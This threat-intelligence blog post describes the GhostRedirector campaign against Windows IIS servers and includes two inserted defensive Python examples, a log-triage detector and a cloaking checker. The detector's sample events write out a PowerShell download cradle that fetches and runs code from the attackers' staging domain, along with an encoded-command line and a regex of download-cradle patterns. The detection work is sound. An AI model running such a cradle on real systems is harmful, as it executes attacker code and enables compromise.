GhostRedirector: Server Poltergeist and SEO Fraud
- Javier Conejo del Cerro
- 5 Sept
- 2 min read

A new phantom threat is haunting Windows servers worldwide. A previously undocumented cluster named GhostRedirector, assessed as China-aligned, has compromised more than 65 Windows servers since at least August 2024. By deploying the Rungan backdoor and the Gamshen IIS module, the attackers combined remote access with SEO fraud-as-a-service, hijacking legitimate infrastructure to promote shady gambling websites while also enabling deeper persistence and data theft.
Phase 1: Breaching the Walls
The intrusion begins with a SQL injection flaw, the likely entry vector into the victims' web applications. Once inside the database, the attackers abused sqlservr.exe (the Microsoft SQL Server service process) and its extended stored procedure xp_cmdshell to run operating-system commands, launching PowerShell scripts that downloaded additional tools from staging infrastructure hosted on 868id[.]com. This foothold was crucial: because the commands ran under the SQL Server service account, the activity blended into normal database behaviour, a classic case of turning a legitimate utility into a weapon of compromise.
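As an added example for this edit (not ESET's tooling or anything from the original write-up), the detection logic below triages process-creation records for the chain described in this phase: sqlservr.exe spawning a shell, a PowerShell download cradle or encoded command, and a reference to the staging domain. Record fields mirror Sysmon Event ID 1 (image, parent image, command line, user); the sample events are constructed, and the URL path under 868id[.]com is invented, since the write-up names only the domain.

```python
# Added example (not ESET's tooling or the page's own code): triage
# process-creation records for the xp_cmdshell -> PowerShell pattern.
# Fields mirror Sysmon Event ID 1; the sample events are constructed.
import re
from dataclasses import dataclass

SQL_SERVER_IMAGES = {"sqlservr.exe"}                 # SQL Server service process
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WATCHLIST_HOSTS = {"868id.com"}                      # staging domain from the write-up
# Common PowerShell download cradles plus -enc/-EncodedCommand (and its -e shorthand).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"certutil\S*\s+-urlcache|-e(nc|ncodedcommand)?\b",
    re.IGNORECASE,
)

F_SQL_SHELL = "shell spawned by SQL Server (xp_cmdshell pattern)"
F_CRADLE = "download cradle or encoded PowerShell command"
F_WATCHLIST = "command line references watchlisted host"


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the findings for one event; an empty list means nothing suspicious."""
    findings = []
    if basename(ev.parent_image) in SQL_SERVER_IMAGES and basename(ev.image) in SHELL_IMAGES:
        findings.append(F_SQL_SHELL)
    if CRADLE_RE.search(ev.command_line):
        findings.append(F_CRADLE)
    cmd = ev.command_line.lower()
    for host in sorted(WATCHLIST_HOSTS):
        if host in cmd:
            findings.append(f"{F_WATCHLIST} {host}")
    return findings


def scan(events) -> dict:
    """Map event index -> findings, keeping only events that raised at least one."""
    result = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = hits
    return result


# Constructed sample telemetry. Event 0 is the Phase 1 chain; the URL path
# "/x" is invented (the write-up names only the domain). Events 3 and 4 are benign.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(CMD, SQLSERVR,
              'cmd.exe /c powershell -nop -w hidden -c '
              '"IEX (New-Object Net.WebClient).DownloadString(\'http://868id.com/x\')"',
              r"NT Service\MSSQLSERVER"),
    ProcEvent(PS, CMD, "powershell -nop -w hidden -enc SQBFAFgA",   # truncated, constructed
              r"NT Service\MSSQLSERVER"),
    ProcEvent(CMD, SQLSERVR, "cmd.exe /c whoami", r"NT Service\MSSQLSERVER"),
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1",
              r"CORP\sysadmin"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs -p", r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].user, "->", "; ".join(hits))
```

In real telemetry the same rules apply to Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled; the parent-child rule is the high-confidence one, since a healthy SQL Server instance has no reason to launch cmd.exe or PowerShell at all unless xp_cmdshell is in legitimate use.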
Phase 2: Phantom Installation
With a foothold established, GhostRedirector deployed its arsenal. The Rungan backdoor, a C++ tool, registered specific URLs on the server and waited for incoming requests to them; it could create rogue user accounts, list folders, add new listening URLs, and execute arbitrary commands. Alongside it, the Gamshen IIS module, a member of the malicious "Group 13" IIS malware family, was loaded directly into the IIS worker process (w3wp.exe). Gamshen intercepted requests whose User-Agent identified them as Googlebot and inserted artificial backlinks into the responses to boost third-party websites in search rankings. Regular visitors received an unmodified page, so the tampering stayed invisible to site owners, but the scheme corrupted SEO integrity and associated victim organizations with fraudulent gambling promotions, damaging their reputation while giving the attackers an ongoing channel of manipulation.
Phase 3: Tools of the Poltergeist
GhostRedirector’s toolkit extended beyond Rungan and Gamshen. The attackers also dropped:
- GoToHTTP, a legitimate remote-access tool that gave the attackers browser-based remote control of the server.
- BadPotato and EfsPotato, Potato-family local privilege escalation tools that abuse SeImpersonatePrivilege (commonly held by service accounts, including the one SQL Server runs as) to reach SYSTEM and create administrator-level accounts.
- Zunput, used for reconnaissance of hosted websites and for planting ASP, PHP, and JavaScript web shells.
Together, these tools granted attackers long-term persistence, stealth, and flexibility. Data stolen during operations included server details, hosted website information, and administrator credentials, all exfiltrated covertly while servers were exploited for SEO manipulation.
Phase 4: Victims Haunted
GhostRedirector’s reach spanned Brazil, Thailand, and Vietnam, with additional infections reported in Peru, the U.S., Canada, Finland, India, the Netherlands, the Philippines, and Singapore. Victims included organizations across education, healthcare, insurance, transportation, technology, and retail sectors—entities hosting IIS services to deliver critical functions. Instead, their servers became haunted houses: still serving normal users, but secretly manipulated to amplify gambling sites and leaking sensitive internal data to attackers.
Phase 5: Banishing the Ghosts
The campaign reflects how legitimate infrastructure can be silently hijacked, turning trusted platforms into fraud machines. Defenders must strengthen resilience by:
- Patching SQL injection flaws promptly, using parameterized queries, and auditing database permissions: in particular, keep xp_cmdshell disabled (its default) and deny sysadmin rights to application logins.
- Hardening IIS servers and regularly auditing the native and managed modules registered in applicationHost.config for unexpected entries like Gamshen.
- Monitoring for unusual PowerShell executions, especially child processes of sqlservr.exe (the SQL Server service process), which point to xp_cmdshell use.
- Auditing SEO anomalies such as unexplained backlinks, pages that differ when fetched as Googlebot versus a normal browser, or altered search engine traffic.
- Detecting persistence mechanisms like rogue accounts, tools (GoToHTTP, BadPotato), or hidden web shells.
- Leveraging strong EDR, account controls, and immutable logs to expose stealthy activity and recover trust.
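The SEO audit above can be made concrete. As an added example for this edit (not ESET's tooling or the page's own code), the check below targets the Gamshen behaviour described in Phase 2: it fetches the same URL once as a normal browser and once with a Googlebot User-Agent, extracts every anchor href (hidden containers included), and reports external links that only the crawler received. The sample pages, the site name www.example.org and the gambling hostnames (on the reserved .invalid TLD) are all constructed.

```python
# Added example (not ESET's tooling or the page's own code): detect
# crawler-only backlinks by diffing a browser fetch against a Googlebot fetch.
from html.parser import HTMLParser
from urllib.parse import urlsplit
import urllib.request

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0 Safari/537.36")


class LinkCollector(HTMLParser):
    """Collect href values of <a> tags; hidden containers are not special-cased."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value.strip())


def extract_links(html: str) -> set:
    parser = LinkCollector()
    parser.feed(html)
    return set(parser.hrefs)


def external_only(hrefs, site_host: str) -> set:
    """Keep absolute links whose host is not the site itself."""
    out = set()
    for href in hrefs:
        host = urlsplit(href).hostname
        if host and host.lower() != site_host.lower():
            out.add(href)
    return out


def cloaking_delta(browser_html: str, bot_html: str, site_host: str) -> list:
    """External links served to the crawler but absent from the browser response."""
    only_bot = extract_links(bot_html) - extract_links(browser_html)
    return sorted(external_only(only_bot, site_host))


def fetch(url: str, user_agent: str, timeout: float = 10.0) -> str:
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_site(url: str) -> list:
    """Fetch url as a browser and as Googlebot; return crawler-only external links."""
    host = urlsplit(url).hostname or ""
    return cloaking_delta(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA), host)


# Constructed sample responses for an imaginary site, www.example.org.
BROWSER_PAGE = """<html><body>
<a href="/about">About</a>
<a href="https://www.example.org/contact">Contact</a>
<a href="https://partner.example.net/">Partner</a>
</body></html>"""

# The crawler copy carries a hidden block of injected gambling backlinks.
BOT_PAGE = BROWSER_PAGE.replace("</body>", """<div style="display:none">
<a href="https://win-big.invalid/slots">best slots</a>
<a href="https://lucky-bet.invalid/">online betting</a>
</div></body>""")

if __name__ == "__main__":
    print(cloaking_delta(BROWSER_PAGE, BOT_PAGE, "www.example.org"))
```

Run check_site against each hosted site from outside the organisation's network. An empty result is not proof of a clean server: a module can key on Googlebot's source IP ranges as well as the User-Agent, so pair this check with a module inventory on the IIS host itself and with Google Search Console's view of the site's inbound and outbound links.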
GhostRedirector demonstrates how cybercriminals can blend espionage, fraud, and persistence into one package—haunting servers not just as backdoors, but as tools of deception that undermine digital trust at scale.